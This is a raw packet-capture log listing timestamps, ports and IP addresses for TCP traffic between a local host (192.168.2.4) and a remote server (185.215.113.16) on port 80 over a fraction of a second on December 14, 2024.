Dec 14, 2024 12:56:25.335953951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.336177111 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.336177111 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.336589098 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.336652994 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.336745024 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.336780071 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.336843967 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.336962938 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.337455034 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.337615013 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.337687016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.338321924 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.338423967 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.338819027 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.339270115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.339304924 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.340116024 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.340213060 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.340818882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.340965033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.341715097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.341847897 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.342570066 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.342583895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.342619896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.343384027 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.343646049 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.344214916 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.344474077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.345143080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.345176935 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.345808983 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.345982075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.346019983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.346817970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.346853018 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.346905947 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.346905947 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.347595930 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.347707033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.348468065 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.348529100 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.348565102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.348807096 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.349394083 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.349430084 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.349536896 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.350133896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.350505114 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.350585938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.350673914 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.351064920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.351099968 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.351138115 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.351234913 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.352011919 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.352046967 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.352730036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.352766037 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.352775097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.353121042 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.353585958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.353620052 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.354418993 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.354599953 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.355165958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.355252028 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.356000900 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.356159925 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.356829882 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.356856108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.356965065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.357469082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.357702017 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.357995987 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.358072996 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.358182907 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.358557940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.358830929 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.359394073 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.359539986 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.360285997 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.360430956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.361069918 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.361181974 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.361483097 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.361754894 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.362020969 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.362059116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.362806082 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.362924099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.363548040 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.372479916 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.511698008 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.511749983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.511893034 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.511950016 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.512017965 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.512200117 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.512636900 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.512672901 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.513041019 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.513453007 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.514067888 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.514329910 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.514364958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.515099049 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.515153885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.515886068 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.516030073 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.516300917 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.516462088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.516843081 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.516877890 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.517594099 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.517651081 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.517684937 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.517745018 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.518395901 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.518610954 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.519241095 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.519375086 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.520065069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.520214081 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.520917892 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.521066904 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.521852970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.522018909 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.522686005 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.522809982 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.523354053 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.523492098 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.523500919 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.523619890 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.524317980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.524348974 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.524427891 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.524609089 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.524677038 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.525161028 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.525249958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.525371075 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.526141882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.526176929 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.526758909 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.526807070 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.526911974 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.526959896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.527060986 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.527674913 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.527895927 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.528562069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.528691053 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.529371023 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.529505014 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.530249119 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.530375957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.530409098 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.531105995 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.531404972 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.532099962 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.532134056 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.532885075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.532918930 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.532951117 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.533154011 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.533576012 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.533655882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.533826113 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.534501076 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.534535885 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.534579039 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.534579039 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.535375118 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.535686016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.535691023 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.535752058 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.536304951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.536340952 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.536355972 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.536565065 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.537069082 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.537103891 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.537174940 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.537174940 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.537889004 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.537924051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.538141966 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.538666964 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.538903952 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.539448023 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.539681911 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.540309906 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.540436029 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.541119099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.541285992 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.542077065 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.542267084 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.542866945 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.543005943 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.543086052 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.543363094 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.543704987 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.544092894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.544775963 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.544810057 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.545480013 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.545588970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.545617104 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.545845032 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.546237946 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.546621084 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.546681881 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.547106981 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.547224045 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.547930956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.548067093 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.548789978 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.548894882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.548928976 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.548950911 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.549010038 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.549699068 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.549735069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.549895048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.550626040 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.550694942 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.550945997 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.551229954 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.551372051 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.551495075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.551547050 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.552315950 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.552354097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.552443027 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.552953959 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.553102016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.553867102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.554002047 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.554655075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.554841995 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.555277109 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.555596113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.555759907 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.704099894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.704150915 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.704191923 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.704277992 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.704405069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.704718113 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.705008030 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.705061913 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.705080032 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.705115080 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.705511093 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.705847025 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.705904961 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.706490040 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.706526041 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.706588030 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.707309961 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.707370996 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.708158970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.708194017 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.708878040 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.709017992 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.709708929 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.709834099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.710563898 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.710684061 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.711419106 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.711525917 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.712246895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.712363958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.713080883 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.713205099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.713934898 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.714050055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.714854002 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.715002060 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.715603113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.715759993 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.716584921 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.716753960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.717307091 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.717417955 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.718142033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.718255043 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.719007015 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.719170094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.719844103 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.719965935 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.720707893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.720855951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.721518993 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.721702099 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.722417116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.722523928 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.723220110 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.723366976 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.724046946 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.724184036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.724946022 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.725047112 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.725733042 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.725878000 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.726669073 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.726779938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.727382898 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.727427006 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.727554083 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.728343010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.728498936 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.729394913 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.729635000 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.730005980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.730103970 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.730845928 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.730920076 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.731686115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.731853962 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.732481956 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.732647896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.733328104 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.733429909 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.734213114 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.734292984 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.735105038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.735140085 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.735873938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.735964060 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.736717939 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.736777067 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.736833096 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.736835003 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.736893892 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.737018108 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.737179995 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.737237930 CET	49796	80	192.168.2.4	185.215.113.16
